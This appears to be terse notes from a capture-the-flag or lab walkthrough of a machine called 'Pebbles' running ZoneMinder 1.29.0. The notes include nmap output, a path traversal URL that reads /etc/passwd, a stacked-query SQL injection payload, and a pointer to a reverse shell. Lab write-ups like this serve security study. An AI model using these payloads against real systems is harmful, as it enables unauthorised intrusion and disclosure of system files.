Pebbles
Enumeration
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Pebbles
|_http-favicon: Unknown favicon MD5: 7EC7ACEA6BB719ECE5FCE0009B57206B
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)ZoneMinder Console - Running - default v1.29.0
https://vulners.com/packetstorm/PACKETSTORM:140927
/zm/index.php?view=file&path=/../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
sally:x:1000:1000:Sally,,,:/home/sally:/bin/bashhttps://www.exploit-db.com/exploits/41239
2)SQL Injection
Example Url:http://192.168.241.131/zm/index.php
Parameter: limit (POST)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: view=request&request=log&task=query&limit=100;(SELECT *
FROM (SELECT(SLEEP(5)))OQkj)#&minTime=1466674406.084434
Easy exploitable using sqlmap.Saved as sqli.req
Access
Getting reverse shell
https://www.revshells.com/ - Bash 196 - 443 port - Reverse Shell
Last updated